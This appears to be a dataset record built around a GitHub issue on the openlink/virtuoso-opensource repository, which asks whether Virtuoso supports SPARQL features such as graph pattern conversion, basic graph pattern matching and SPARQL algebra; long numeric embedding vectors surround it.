0.005530238151550293, -0.007349865045398474, -0.007856505922973156, 0.0015520346350967884, -0.02544623240828514, -0.006193866953253746, -0.003055902663618326, -0.019609155133366585, -0.016412319615483284, 0.01868150196969509, 0.011210327968001366, 0.017397059127688408, 0.007735197898000479, 0.026602230966091156, -0.0024457925464957952, -0.0038247841876000166, -0.014050372876226902, 0.001242519705556333, -0.005355411674827337, -0.010425391606986523, 0.014250175096094608, 0.009326479397714138, 0.012444820255041122, -0.007621025200933218, 0.012145116925239563, -0.013372473418712616, -0.0007969787111505866, -0.012038080021739006, -0.014999433420598507, 0.004281474743038416, -0.01821053959429264, 0.009305072017014027, -0.020736610516905785, 0.010746502317488194, 0.013329658657312393, 0.03114059381186962, 0.009012504480779171, 0.008348875679075718, 0.0006221518269740045, 0.0033341986127197742, -0.01796792261302471, 0.002850748598575592, -0.0032539209350943565, -0.007068001199513674, 0.016169702634215355, 0.01715444214642048, -0.0225491002202034, 0.005326868500560522, 0.01631241850554943, 0.004417054820805788, -0.00816334504634142, -0.0011229951633140445, 0.0021835521329194307, 0.003985339310020208, 0.03587875887751579, 0.016155431047081947, 0.01133163645863533, 0.010782181285321712, 0.004902288783341646, 0.008891195990145206, -0.0052412389777600765, 0.00320397038012743, 0.013236893340945244, 0.014021830633282661, -0.010882082395255566, 0.008677122183144093, 0.02343393862247467, 0.01412173081189394, 0.005854916758835316, -0.0004236876266077161, -0.020893597975373268, 0.011774055659770966, -0.0021853360813111067, 0.02397625893354416, 0.013251164928078651, -0.01068228017538786, -0.0020426202099770308, 0.017810935154557228, 0.008919739164412022, 0.020394092425704002, 0.008463048376142979, 0.033309873193502426, -0.004128055181354284, 0.017825206741690636, -0.0039104134775698185, 0.05263359844684601, 0.0030451989732682705, -0.008777023293077946, -0.0207651536911726, 0.0016635314095765352, -0.019651969894766808, 0.002169280545786023, -0.010932032018899918, -0.021321745589375496, 0.027972303330898285, 0.03014158271253109, 0.0194521676748991, 0.028443263843655586, 0.005762151442468166, -0.008006357587873936, 0.02266327291727066, 0.008512998931109905, 0.012023808434605598, -0.011774055659770966, -0.0009749275050126016, -0.00792072806507349, 0.009183763526380062, -0.002178200287744403, 0.016226788982748985, -0.01444284152239561, -0.006657693535089493, 0.010996254161000252, 0.015713011845946312, -0.016226788982748985, 0.0038890063297003508, -0.019081106409430504, -0.01638377644121647, 0.014350076206028461, -0.00734272925183177, 0.002993464469909668, -0.00532330060377717, -0.014407162554562092, 0.014128866605460644, 0.006432916037738323, 0.0029791928827762604, 0.0020479720551520586, -0.02675921842455864, 0.03068390302360058, 0.016640665009617805, -0.008962553925812244, -0.006111805327236652, 0.008084851317107677, 0.0029488657601177692, 0.01539903786033392, 0.036392536014318466, -0.00003197168916813098, 0.00949773844331503, -0.008398826234042645, -0.022235125303268433, 0.017482688650488853, -0.011281685903668404, 0.016954639926552773, 0.027073193341493607, 0.0005744312074966729, 0.002850748598575592, -0.019837500527501106, 0.008998232893645763, 0.027244452387094498 ]
null
null
null
null
null
null
null
null
null
[ "openlink", "virtuoso-opensource" ]
I was wondering if Virtuoso has support of additional SPARQL features which are [Converting Graph Patterns](https://www.w3.org/TR/rdf-sparql-query/#convertGraphPattern), [Basic Graph Pattern Matching](https://www.w3.org/TR/rdf-sparql-query/#BGPsparql), [Evaluation Semantics](https://www.w3.org/TR/rdf-sparql-query/#sparqlAlgebraEval), [SPARQL Algebra](https://www.w3.org/TR/rdf-sparql-query/#sparqlAlgebra), apart from insert, update, delete and inferencing?
Full Features Support of SPARQL
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1112/comments
2
2023-03-06T09:38:10
2023-03-07T15:46:41Z
https://github.com/openlink/virtuoso-opensource/issues/1112
1,611,018,281
1,112
false
This is a GitHub Issue repo:virtuoso-opensource owner:openlink Title : Full Features Support of SPARQL Issue date: --- start body --- I was wondering if Virtuoso has support of additional SPARQL features which are [Converting Graph Patterns](https://www.w3.org/TR/rdf-sparql-query/#convertGraphPattern), [Basic Graph Pattern Matching](https://www.w3.org/TR/rdf-sparql-query/#BGPsparql), [Evaluation Semantics](https://www.w3.org/TR/rdf-sparql-query/#sparqlAlgebraEval), [SPARQL Algebra](https://www.w3.org/TR/rdf-sparql-query/#sparqlAlgebra), apart from insert, update, delete and inferencing? --- end body ---
612
[ -0.013606012798845768, 0.016462842002511024, -0.030415138229727745, 0.02535075694322586, -0.012862948700785637, 0.007131253369152546, 0.022883495315909386, 0.02321534976363182, 0.001489735790528357, 0.022118788212537766, 0.048796962946653366, 0.014774715527892113, 0.01196117140352726, 0.014046079479157925, -0.032550547271966934, 0.048537250608205795, -0.025725897401571274, -0.006510830484330654, -0.006420652847737074, -0.04562270641326904, -0.02422533929347992, 0.025624897330999374, -0.027659306302666664, 0.03332968056201935, -0.0064639379270374775, 0.005403448361903429, -0.008873486891388893, 0.012134312652051449, -0.06515880674123764, 0.026750314980745316, 0.03638850897550583, 0.031482841819524765, 0.030876846984028816, 0.03912991285324097, -0.004483635537326336, -0.009602122008800507, 0.03306996822357178, -0.011124322190880775, -0.02183021977543831, 0.01786240004003048, -0.0186271071434021, -0.009335196577012539, 0.00418785260990262, 0.013800796121358871, -0.01154996082186699, 0.006958112120628357, 0.0037549997214227915, -0.013786368072032928, -0.015611564740538597, -0.045940130949020386, 0.00288929371163249, -0.009436195716261864, 0.026432890444993973, -0.010554399341344833, 0.0044151004403829575, -0.0342242456972599, 0.04891238734126091, 0.01307937502861023, 0.019507242366671562, 0.007275537587702274, -0.026533888652920723, -0.015207569114863873, -0.014745858497917652, 0.0186271071434021, -0.04337187111377716, 0.010496685281395912, -0.00992676243185997, 0.007008611690253019, -0.04790239781141281, -0.017876828089356422, 0.028438441455364227, 0.020776944234967232, 0.002734188223257661, 0.01618870161473751, 0.010850181803107262, 0.01437793392688036, -0.028063302859663963, -0.007856282405555248, 0.010215330868959427, -0.03205997869372368, 0.0066046155989170074, 0.018352966755628586, -0.041611600667238235, 0.025769181549549103, -0.01836739480495453, -0.01229302491992712, -0.024412909522652626, -0.05756944790482521, 0.018511680886149406, 0.005969764199107885, -0.03205997869372368, -0.03058827854692936, 0.01117482129484415, -0.03413767367601395, 0.016001133248209953, 0.011102679185569286, -0.018049970269203186, -0.026548316702246666, -0.04464157298207283, 0.0386682003736496, 0.028279729187488556, -0.0032427904661744833, 0.007740854285657406, -0.018800249323248863, 0.0654473751783371, -0.0017305102664977312, 0.009659836068749428, -0.03125198557972908, 0.003928141202777624, 0.07658612728118896, -0.0006551410770043731, -0.023027779534459114, -0.02830858714878559, -0.008772487752139568, -0.010785253718495369, -0.0228546392172575, -0.002943400526419282, -0.03477252274751663, 0.024167625233530998, 0.010922323912382126, -0.00023581470304634422, 0.01578470692038536, 0.012430095113813877, -0.06527423113584518, -0.06117655709385872, 0.0193341001868248, -0.036417365074157715, -0.02677917294204235, -0.024571621790528297, -0.03508995100855827, -0.03211769089102745, -0.016159845516085625, -0.030559422448277473, -0.048075541853904724, 0.03878362849354744, 0.0175161175429821, -0.0036359652876853943, 0.021253082901239395, -0.03257940337061882, 0.004342958331108093, -0.06850620359182358, -0.019723668694496155, 0.014875714667141438, -0.008051065728068352, 0.007697569206357002, 0.0089600570499897, -0.035551659762859344, 0.0646393820643425, -0.0035241448786109686, -0.0220466461032629, 0.03959162160754204, -0.014623217284679413, 0.04363158345222473, -0.034628238528966904, 0.013692582957446575, 0.034685954451560974, -0.026202034205198288, -0.02789016254246235, 0.03500337898731232, 0.005540518555790186, -0.008498347364366055, 0.007167324423789978, -0.004718097858130932, 0.04097675159573555, 0.011708674021065235, 0.05073036998510361, -0.029001150280237198, 0.03696564584970474, -0.023792486637830734, 0.01709769293665886, -0.004487243015319109, 0.008036637678742409, -0.003001114120706916, -0.028164301067590714, -0.012985589914023876, 0.003794678021222353, 0.02198893204331398, -0.0016718946862965822, 0.004151781555265188, -0.018800249323248863, -0.025639325380325317, 0.0012417470570653677, -0.022104360163211823, 0.008440633304417133, 0.02855386957526207, 0.018237540498375893, 0.08720545470714569, -0.01058325543999672, 0.019377386197447777, -0.026865743100643158, 0.010677040554583073, 0.06896790862083435, -0.006442295387387276, -0.013483370654284954, -0.020113235339522362, 0.00718896696344018, -0.01719869300723076, -0.004144567530602217, -0.0134905856102705, -0.024441765621304512, 0.02591346576809883, -0.022017790004611015, 0.014190364629030228, 0.002131801098585129, 0.0066406866535544395, 0.01582799106836319, -0.013404014520347118, 0.003812713548541069, 0.0023211741354316473, -0.02561046928167343, -0.010273044928908348, -0.0009297321666963398, -0.01229302491992712, -0.0031670411117374897, -0.03332968056201935, 0.010835753753781319, -0.006132084410637617, -0.017039980739355087, -0.005172593519091606, -0.033358536660671234, 0.02015652135014534, -0.018915675580501556, 0.007452285848557949, 0.009017771109938622, -0.008700345642864704, 0.0029379897750914097, -0.03889905661344528, -0.06815992295742035, -0.028597155585885048, 0.03286797180771828, 0.058406297117471695, 0.005944514647126198, -0.014904571697115898, -0.03125198557972908, 0.022335214540362358, 0.013447299599647522, -0.0010929538402706385, -0.03289682790637016, -0.02891458012163639, 0.018396252766251564, 0.008974486030638218, -0.008527204394340515, -0.0020885157864540815, 0.014601574279367924, -0.012776377610862255, 0.04091903567314148, -0.014875714667141438, 0.0477292574942112, -0.0018360181711614132, 0.01007826067507267, -0.011008895002305508, -0.007827425375580788, 0.00446560001000762, 0.01923310197889805, -0.005345734767615795, -0.0008404562249779701, 0.026331890374422073, 0.04031304270029068, -0.056588314473629, -0.01267537847161293, 0.020243091508746147, -0.020473947748541832, -0.002259853295981884, 0.01715540699660778, -0.013115446083247662, 0.003484466578811407, -0.004985023755580187, -0.025365184992551804, 0.007228645030409098, 0.004393457900732756, 0.050932370126247406, 0.030819132924079895, -0.04908553138375282, 0.03526309132575989, -0.019709240645170212, -0.03159826993942261, -0.02408105507493019, -0.014846857637166977, 0.061465125530958176, -0.020632660016417503, -0.017833543941378593, 0.023229777812957764, 0.02361934632062912, 0.008036637678742409, 0.02271035499870777, 0.01856939308345318, -0.021815791726112366, 0.01649169996380806, -0.02810658887028694, -0.039418481290340424, -0.013966723345220089, -0.010395686142146587, -0.031078845262527466, 0.02086351439356804, -0.004783025477081537, 0.026230892166495323, 0.015236425213515759, -0.0007633542991243303, 0.004137353505939245, 0.00562708918005228, -0.021801363676786423, 0.02005552314221859, 0.017645973712205887, 0.023056635633111, -0.0720844566822052, 0.016708126291632652, -0.0021444258745759726, 0.04928752779960632, -0.01568370684981346, -0.043285299092531204, 0.030357424169778824, -0.010352401062846184, -0.003583662211894989, -0.024138769134879112, 0.0024564408231526613, 0.06429310142993927, 0.015799134969711304, 0.024239767342805862, -0.04340072721242905, -0.015452852472662926, -0.02116651087999344, -0.008079922758042812, -0.052548352628946304, 0.00391731970012188, 0.08010666072368622, 0.018194254487752914, 0.0015131819527596235, 0.005958943162113428, -0.017948972061276436, -0.015856849029660225, 0.01979581080377102, -0.000843612477183342, -0.0025754752568900585, -0.00872920174151659, 0.012963947840034962, -0.07398900389671326, -0.017790257930755615, -0.02885686606168747, -0.009760835207998753, -0.018439538776874542, -0.007719211746007204, 0.05950285866856575, -0.00218771118670702, -0.0117808161303401, 0.018915675580501556, -0.008317992091178894, 0.014890143647789955, -0.02136850915849209, 0.025235330685973167, 0.03286797180771828, 0.000799876288510859, 0.026836887001991272, -0.045882418751716614, -0.02575475350022316, 0.047671545296907425, -0.029030008241534233, -0.015914561226963997, -0.052952349185943604, 0.017285263165831566, -0.006471152417361736, 0.029145436361432076, -0.05531861260533333, -0.02901558019220829, 0.04106331989169121, -0.028683725744485855, 0.008916771970689297, -0.015741420909762383, 0.01989680901169777, -0.018453966826200485, 0.013360729441046715, -0.05182693153619766, -0.005720873828977346, 0.004296066239476204, -0.00011525838635861874, -0.033214252442121506, 0.018728107213974, -0.0012922465102747083, -0.02102222666144371, 0.015438423492014408, 0.026389604434370995, -0.0016051632119342685, 0.0012210061540827155, -0.005010273307561874, -0.0186271071434021, 0.007452285848557949, 0.0027648485265672207, 0.025365184992551804, -0.018598251044750214, -0.026851315051317215, -0.03205997869372368, 0.006586580071598291, 0.008657059632241726, -0.014298577792942524, -0.01305773202329874, -0.011766387149691582, -0.0003379409608896822, -0.05742516368627548, -0.01397393736988306, -0.015582707710564137, 0.012394024059176445, 0.04305444657802582, -0.051740363240242004, -0.0354362316429615, 0.028481727465987206, 0.0008084431756287813, 0.010042189620435238, -0.013447299599647522, -0.012148740701377392, 0.03959162160754204, 0.006326868198812008, -0.011362391524016857, -0.004169817082583904, -0.038956768810749054, -0.009414552710950375, 0.038004495203495026, 0.03185798227787018, -0.004768597427755594, 0.04703669250011444, -0.002369870198890567, 0.024499479681253433, -0.010071046650409698, 0.03993790224194527, 0.002882079454138875, -0.03924533724784851, -0.012581594288349152, -0.013851296156644821, 0.015221997164189816, -0.02519204467535019, -0.0037045003846287727, -0.019103245809674263, -0.0015618778998032212, -0.029751429334282875, 0.021498365327715874, -0.02666374482214451, -0.030068855732679367, -0.001790929352864623, -0.017386261373758316, 0.030617136508226395, -0.01588570512831211, -0.013353515416383743, -0.03771592304110527, -0.008563275448977947, -0.03312768414616585, 0.004288851749151945, -0.0074090007692575455, -0.0072358595207333565, -0.05442405119538307, -0.0012399435508996248, 0.007214216515421867, -0.011037751100957394, 0.002413155511021614, 0.0051870220340788364, -0.007091574836522341, -0.028178730979561806, 0.007776925805956125, -0.019637098535895348, 0.02309992164373398, 0.009248625487089157, 0.062273118644952774, -0.008094350807368755, -0.07035303860902786, 0.012812448665499687, 0.018742535263299942, -0.048075541853904724, 0.016708126291632652, 0.02581246756017208, -0.03956276550889015, -0.028063302859663963, 0.006539687514305115, -0.009602122008800507, 0.01989680901169777, 0.004985023755580187, 0.006110441405326128, -0.0025718682445585728, 0.01284851972013712, -0.005684802774339914, 0.01382243912667036, -0.038552772253751755, -0.00821699295192957, 0.011723102070391178, 0.009645408019423485, -0.0029343825299292803, 0.00711321784183383, 0.0050319163128733635, -0.022782497107982635, -0.014233649708330631, 0.030155425891280174, 0.010835753753781319, -0.0193341001868248, 0.03511880710721016, -0.0068282559514045715, 0.03180026635527611, -0.03832191973924637, -0.007776925805956125, 0.008447847329080105, 0.0015393334906548262, -0.008310778066515923, 0.0008449651068076491, -0.002000141656026244, 0.00027211123961023986, -0.021541651338338852, -0.022205358371138573, -0.007524427957832813, -0.008108779788017273, 0.0119323143735528, 0.007488356903195381, -0.007560499012470245, 0.00046621874207630754, -0.028741439804434776, 0.001673698308877647, -0.01229302491992712, -0.025725897401571274, -0.025437328964471817, -0.06025313958525658, 0.01285573374480009, -0.004851560574024916, 0.0004531429731287062, 0.006261940114200115, 0.017948972061276436, -0.014904571697115898, 0.00781299639493227, -0.01287737675011158, -0.031684838235378265, 0.0467192679643631, -0.02269592508673668, 0.025033332407474518, -0.010424543172121048, -0.004963381215929985, 0.012805234640836716, -0.013750297017395496, -0.014240863732993603, -0.03223311901092529, 0.004029139876365662, 0.02555275522172451, -0.006355724763125181, 0.026432890444993973, 0.002276085317134857, 0.023475060239434242, 0.011694245040416718, -0.002203943207859993, -0.06031085178256035, 0.027414023876190186, -0.028626011684536934, -0.021469509229063988, 0.03350282087922096, 0.005713659804314375, 0.025624897330999374, 0.0030948990024626255, -0.0010442578932270408, 0.004342958331108093, -0.006647900678217411, -0.03304111212491989, 0.0025556362234055996, -0.004617098718881607, 0.015943419188261032, -0.04068818315863609, 0.01577027700841427, 0.005760551895946264, 0.03979361802339554, -0.00974640715867281, 0.003776642493903637, -0.0078057823702692986, 0.01715540699660778, 0.010532756336033344, 0.006651507690548897, 0.0011218107538297772, -0.013151517137885094, 0.007315215654671192, -0.022782497107982635, -0.029304148629307747, 0.003895676927641034, 0.03353168070316315, -0.008707559667527676, -0.023994484916329384, -0.01639069989323616, -0.011145965196192265, 0.02061823196709156, -0.008339634165167809, -0.0058687650598585606, -0.0010172046022489667, 0.004281637724488974, -0.022768067196011543, 0.00972476415336132, 0.02452833764255047, 0.006673150230199099, 0.00109385559335351, 0.006997790187597275, 0.0018270004075020552, 0.00577858742326498, -0.014341862872242928, 0.014327434822916985, 0.0029163470026105642, -0.0026854921597987413, -0.051076654344797134, 0.020647088065743446, 0.01715540699660778, 0.008231421001255512, 0.012285810895264149, 0.01826639659702778, -0.03197340667247772, -0.01338237151503563, 0.008635417558252811, 0.02030080556869507, 0.007322430144995451, -0.009219769388437271, -0.007452285848557949, -0.018309682607650757, -0.02565375529229641, 0.020199807360768318, 0.008721987716853619, -0.01588570512831211, -0.013721439987421036, 0.04091903567314148, -0.04063046723604202, 0.008260278031229973, 0.00045472109923139215, 0.0004626116424333304, 0.0035439839120954275, -0.024816906079649925, -0.002422173274680972, 0.05338520184159279, -0.05381805822253227, 0.007986137643456459, -0.004169817082583904, -0.005767766386270523, 0.049143243581056595, 0.00034763506846502423, -0.017039980739355087, -0.020170949399471283, -0.006420652847737074, 0.0029866856057196856, -0.037687066942453384, -0.02178693376481533, 0.0005248342640697956, -0.019204244017601013, 0.023128779605031013, -0.008296349085867405, 0.023056635633111, 0.0011641941964626312, 0.03136741369962692, -0.028481727465987206, 0.015481708571314812, 0.02096451446413994, 0.05364491418004036, -0.01325973030179739, 0.007755282800644636, -0.013634869828820229, 0.018814677372574806, -0.008909557946026325, 0.013606012798845768, 0.000715560105163604, 0.015265282243490219, 0.007654284127056599, 0.027168739587068558, 0.018295252695679665, -0.024138769134879112, 0.0038091063033789396, 0.009912333451211452, -0.013173160143196583, 0.02412434108555317, -0.015063284896314144, -0.001266996841877699, -0.010381258092820644, 0.002598921535536647, -0.004476421512663364, 0.002378887962549925, 0.002129997592419386, -0.035291947424411774, -0.009457837790250778, 0.006186190992593765, -0.009125984273850918, -0.018800249323248863, -0.01924753002822399, -0.016260843724012375, -0.004696454852819443, -0.009371267631649971, -0.02524975873529911, -0.007567713502794504, 0.007214216515421867, -0.008303563110530376, -0.035551659762859344, 0.0009603925864212215, -0.006914826575666666, -0.03191569447517395, 0.0034429850056767464, -0.012091027572751045, 0.0037008931394666433, -0.003657607827335596, 0.007697569206357002, -0.02096451446413994, 0.016275273635983467, -0.021253082901239395, 0.01058325543999672, 0.036879077553749084, 0.0364462211728096, 0.01458714623004198, 0.008087136782705784, 0.012004456482827663, 0.013180374167859554, -0.014190364629030228, -0.019117673859000206, 0.006644293665885925, 0.002651224611327052, -0.016405127942562103, 0.024138769134879112, 0.004278030712157488, 0.009356838651001453, -0.004523314069956541, -0.023893484845757484, 0.021960075944662094, -0.013476156629621983, -0.007798568345606327, 0.01975252479314804, 0.010352401062846184, -0.008873486891388893, -0.0011741137132048607, 0.04821982607245445, -0.0115283178165555, -0.01010711770504713, -0.012935090810060501, 0.018352966755628586, -0.014724216423928738, 0.009400124661624432, -0.0064459023997187614, -0.006427866872400045, -0.020589374005794525, 0.015019998885691166, 0.0010181063553318381, -0.002827972872182727, 0.0091115552932024, -0.022984493523836136, -0.00819534994661808, 0.04071703925728798, 0.0014680931344628334, -0.020329663529992104, 0.0095155518501997, 0.006784970872104168, 0.017934542149305344, 0.032492831349372864, -0.03457052633166313, 0.017011122778058052, 0.022003360092639923, -0.03659050539135933, -0.029448432847857475, 0.023244205862283707, -0.012502237223088741, 0.031165415421128273, 0.010741968639194965, -0.014341862872242928, 0.018295252695679665, 0.011860172264277935, -0.026331890374422073, 0.009681479074060917, -0.026144322007894516, -0.03018428198993206, -0.0012913447571918368, -0.005641517229378223, -0.0018188843969255686, 0.013036089949309826, -0.018872391432523727, 0.020488375797867775, 0.02372034452855587, -0.008534418419003487, 0.014428433030843735, 0.02794787473976612, -0.015914561226963997, -0.01878581941127777, -0.0007768809446133673, 0.01695340871810913, -0.033675964921712875, -0.01898781768977642, -0.005681195762008429, 0.028337443247437477, -0.013000018894672394, -0.009652622044086456, 0.003565626684576273, -0.017487261444330215, -0.006763328332453966, -0.023056635633111, 0.014991141855716705, -0.01010711770504713, -0.004880417603999376, -0.03817763552069664, 0.018006684258580208, -0.009984475560486317, -0.04215988144278526, 0.021556079387664795, -0.021108798682689667, 0.035205379128456116, -0.022522784769535065, 0.05243292823433876, -0.015106569975614548, 0.008144850842654705, 0.02041623368859291, 0.03278139978647232, -0.017847971990704536, -0.003197701647877693, -0.0016033597057685256, -0.030039997771382332, 0.005197843071073294, 0.00857770349830389, -0.01812211237847805, 0.007344072684645653, 0.03177141025662422, 0.016044417396187782, 0.00783463940024376, -0.007495570927858353, 0.007762497290968895, -0.020531659945845604, 0.005973371211439371, 0.020589374005794525, 0.0012192026479169726, 0.006420652847737074, -0.0013734064996242523, 0.020243091508746147, -0.0136420838534832, 0.005111272446811199, 0.008563275448977947, 0.0011218107538297772, 0.036936789751052856, -0.0019135710317641497, 0.008743630722165108, -0.0044331359677016735, -0.024167625233530998, -0.01634741574525833, -0.029837999492883682, 0.005313270725309849, 0.01232188194990158, 0.022219788283109665, -0.011975599452853203, 0.03090570494532585, -0.016967836767435074, -0.011189250275492668, -0.020329663529992104, -0.035349663347005844, 0.04236188158392906, 0.02581246756017208, -0.0074234288185834885, -0.01828082464635372, 0.06250397115945816, -0.026562746614217758, -0.020041093230247498, 0.021512793377041817, -0.02239292860031128, 0.014918999746441841, -0.02957828901708126, 0.02646174654364586, -0.004930917173624039, -0.0031021132599562407, 0.0235616322606802, 0.025264186784625053, -0.02271035499870777, 0.027717020362615585, 0.018078826367855072, 0.0008877995423972607, 0.0038848556578159332, -0.007466714363545179, 0.0077697113156318665, -0.01893010549247265, 0.01628970168530941, 0.012978375889360905, 0.014933428727090359, -0.020199807360768318, -0.014991141855716705, 0.014161507599055767, -0.014399576932191849, 0.025408471003174782, -0.01402443740516901, -0.0027287774719297886, -0.0011245160130783916, -0.04392015188932419, -0.030559422448277473, -0.01007826067507267, 0.016506128013134003, 0.029549431055784225, 0.040284186601638794, -0.005277199670672417, -0.006211440544575453, 0.032608259469270706, 0.0028766689356416464, -0.013281373307108879, -0.01512099802494049, -0.013555512763559818, 0.007261109072715044, 0.019276386126875877, -0.01969481073319912, -0.014774715527892113, -0.026274176314473152, -0.01025861594825983, -0.015640422701835632, -0.010402900166809559, -0.020733658224344254, -0.024917904287576675, -0.0023374061565846205, -0.002229192992672324, 0.019564956426620483, -0.030963417142629623, 0.00201817718334496, -0.039014484733343124, -0.034628238528966904, -0.013476156629621983, -0.024759192019701004, 0.003812713548541069, -0.030039997771382332, 0.012538308277726173, -0.0054719834588468075, 0.022681497037410736, -0.0043393513187766075, 0.023071065545082092, 0.0049345241859555244, -0.015221997164189816, 0.01755940355360508, 0.0044367434456944466, -0.03439738601446152, -0.003834356088191271, -0.0050499518401920795, 0.0022832995746284723, -0.017977828159928322, 0.001055980916135013, 0.012040527537465096, 0.04213102534413338, 0.017270835116505623, -0.0037622139789164066, -0.013317444361746311, -0.005976978689432144, -0.009594907984137535, 0.0096670500934124, -0.024456193670630455, -0.019709240645170212, 0.0136420838534832, -0.011614888906478882, 0.0038163205608725548, 0.05404891073703766, -0.013129874132573605, -0.01665041223168373, -0.046805836260318756, 0.006510830484330654, 0.0025177616626024246, -0.028597155585885048, -0.018655965104699135, -0.0014906375436112285, -0.03217540681362152, 0.003235576208680868, -0.019940095022320747, 0.01894453354179859, 0.004728918895125389, 0.016664840281009674, 0.013375157490372658, -0.009241411462426186, 0.024816906079649925, 0.02840958535671234, 0.0017575635574758053, -0.026952313259243965, 0.009796906262636185, 0.004956166725605726, -0.01848282292485237, -0.030876846984028816, -0.010496685281395912, 0.03526309132575989, -0.022421784698963165, -0.0026295820716768503, 0.01741511933505535, 0.028164301067590714, -0.009479480795562267, 0.0018143755150958896, 0.014904571697115898, 0.00992676243185997, 0.007762497290968895, -0.025971179828047752, 0.023330776020884514, 0.0030768634751439095, 0.035811372101306915, -0.022840209305286407, 0.024095483124256134, 0.01806439831852913, 0.01237238198518753, -0.0025123509112745523, -0.02249392680823803, 0.011290249414741993, 0.018078826367855072, 0.01232188194990158, -0.008505561389029026, 0.01842510886490345, 0.04495899751782417, 0.031136559322476387, -0.034685954451560974, 0.018973389640450478, 0.02239292860031128, -0.013901795260608196, -0.006200619041919708, 0.004047175403684378, 0.006435081362724304, -0.008253064006567001, 0.022075502201914787, -0.006626258138567209, 0.018468394875526428, 0.002249032026156783, -0.008736416697502136, -0.0018161790212616324, -0.008087136782705784, 0.003805499291047454, -0.03780249506235123, 0.009962833486497402, -0.00799335166811943, 0.028279729187488556, 0.015539422631263733, -0.009825763292610645, 0.01812211237847805, -0.017140978947281837, 0.019564956426620483, -0.025841323658823967, -0.016246415674686432, -0.004231138154864311, 0.003347396617755294, 0.007437857333570719, -0.015149855054914951, 0.026865743100643158, 0.015856849029660225, 0.0044511714950203896, -0.028323015198111534, -0.041553888469934464, -0.008649845607578754, 0.000945964187849313, -0.035349663347005844, 0.009212554432451725, 0.02473033405840397, -0.017703687772154808, 0.0027648485265672207, 0.020748088136315346, -0.005497233010828495, -0.0006952701369300485, -0.0017548581818118691, 0.02061823196709156, -0.02555275522172451, -0.028885724022984505, -0.0058687650598585606, -0.002404137747362256, -0.05554946884512901, -0.028020016849040985, -0.010085474699735641, 0.019175387918949127, -0.020329663529992104, 0.010352401062846184, 0.011470604687929153, -0.0020073556806892157, -0.007138467393815517, -0.011275820434093475, 0.01816539838910103, 0.0018080630106851459, -0.05765601992607117, 0.048796962946653366, 0.00727914460003376, 0.035407375544309616, -0.023633774369955063, 0.022840209305286407, 0.0025664574932307005, -0.005212271586060524, 0.00220213970169425, 0.02203221805393696, 0.027630450204014778, 0.026548316702246666, -0.01582799106836319, 0.0032932900357991457, -0.014291362836956978, -0.01588570512831211, -0.017169835045933723, -0.028669297695159912, -0.0023554416839033365, 0.026634888723492622, -0.0026764743961393833, 0.021902361884713173, 0.014717002399265766, -0.0033455928787589073, -0.005385412834584713, -0.02335963398218155, -0.009320767596364021, -0.003237379714846611, 0.013310229405760765, 0.004617098718881607, -0.0032950935419648886, -0.00003035043482668698, -0.0342242456972599, 0.02148393727838993, 0.038610488176345825, -0.010576041415333748, -0.013202016241848469, -0.009551622904837132, -0.007495570927858353, -0.01618870161473751, -0.006171762477606535, -0.021440651267766953, 0.004292458761483431, 0.016116559505462646, -0.008642631582915783, 0.010590470395982265, -0.010352401062846184, -0.002827972872182727, 0.07623983919620514, 0.007733640260994434, 0.002827972872182727, 0.010496685281395912, -0.022681497037410736, -0.0026818851474672556, -0.003145398572087288, -0.004043568391352892, -0.005118486937135458, -0.03609994053840637, 0.025033332407474518, 0.00484795356169343, 0.003484466578811407, 0.023633774369955063, -0.026836887001991272, 0.022219788283109665, -0.0003873132518492639, -0.011470604687929153, 0.01828082464635372, -0.017285263165831566, -0.012206454761326313, 0.012249739840626717, -0.011218107305467129, -0.01030911598354578, 0.014918999746441841, -0.017285263165831566, 0.01566927880048752, -0.005360162816941738, 0.03159826993942261, 0.0023356026504188776, -0.017429547384381294, -0.0003913712571375072, 0.013317444361746311, -0.00718896696344018, 0.002550225704908371, -0.002806330332532525, 0.005919264629483223, 0.021570507436990738, -0.014421219006180763, 0.00799335166811943, -0.018453966826200485, -0.013880153186619282, -0.0026187605690211058, -0.00004703331069322303, 0.011715888045728207, 0.010597684420645237, 0.0228546392172575, -0.0010388472583144903, -0.006665936205536127, -0.0028766689356416464, 0.007026647217571735, -0.033416252583265305, 0.037542782723903656, -0.02462933585047722, -0.009558836929500103, -0.00781299639493227, -0.013548298738896847, 0.006139298435300589, 0.011650959961116314, -0.005035523325204849, -0.00954440888017416, 0.017876828089356422, 0.008238635025918484, -0.047007836401462555, 0.022782497107982635, 0.01384408213198185, -0.0005636106943711638, -0.03823534771800041, 0.03104998916387558, 0.005165379028767347, -0.012639307416975498, 0.009832977317273617, 0.006510830484330654, 0.012956732884049416, 0.03477252274751663, 0.03263711556792259, -0.0018991425167769194, 0.010092688724398613, 0.04758497327566147, -0.00543230539187789, -0.02947728894650936, -0.015423995442688465, -0.029405146837234497, 0.014233649708330631, -0.01634741574525833, 0.008022208698093891, -0.02291235141456127, -0.0047794184647500515, -0.00344118126668036, 0.0024546373169869184, 0.008584917522966862, 0.02840958535671234, 0.0006830961210653186, 0.0040543898940086365, -0.004057996906340122, -0.016621556133031845, 0.012127098627388477, 0.004642348270863295, -0.015380710363388062, 0.008101565763354301, 0.02118094079196453, 0.006308832671493292, 0.03156941384077072, 0.008721987716853619, -0.001399558037519455, -0.015481708571314812, -0.011448961682617664, -0.0016556627815589309, 0.026432890444993973, -0.012559951283037663, 0.026187606155872345, -0.009407338686287403, 0.03159826993942261, -0.006380974780768156, 0.012105455622076988, 0.0006817434914410114, 0.0014284149510785937, 0.020142093300819397, 0.00872920174151659, -0.004501671064645052, 0.002669260138645768, 0.008895128965377808, 0.0033221468329429626, -0.033358536660671234, 0.010381258092820644, 0.02651946060359478, 0.01995452307164669, 0.0034051102120429277, -0.0033978959545493126, 0.0021245868410915136, 0.010402900166809559, 0.00972476415336132, 0.03410881757736206, 0.00949390884488821, 0.018194254487752914, -0.008440633304417133, 0.0048768105916678905, 0.015640422701835632, 0.016635984182357788, -0.010547184385359287, -0.013634869828820229, 0.0044187079183757305, 0.004425921943038702, 0.012451738119125366, -0.0019153745379298925, -0.012271382845938206, 0.006471152417361736, -0.00570283830165863, -0.022580498829483986, 0.00013560472871176898, -0.01532299630343914, -0.018511680886149406, 0.005158165004104376, 0.007921209558844566, 0.023893484845757484, -0.004508885554969311, -0.010980037972331047, 0.0017386262770742178, 0.02636074833571911, -0.012127098627388477, 0.024008912965655327, 0.01178803015500307, 0.014010008424520493, -0.030068855732679367, -0.020589374005794525, 0.02021423541009426, -0.005908443592488766, -0.02086351439356804, -0.014493361115455627, -0.01232188194990158, -0.002855026163160801, -0.00550805451348424, 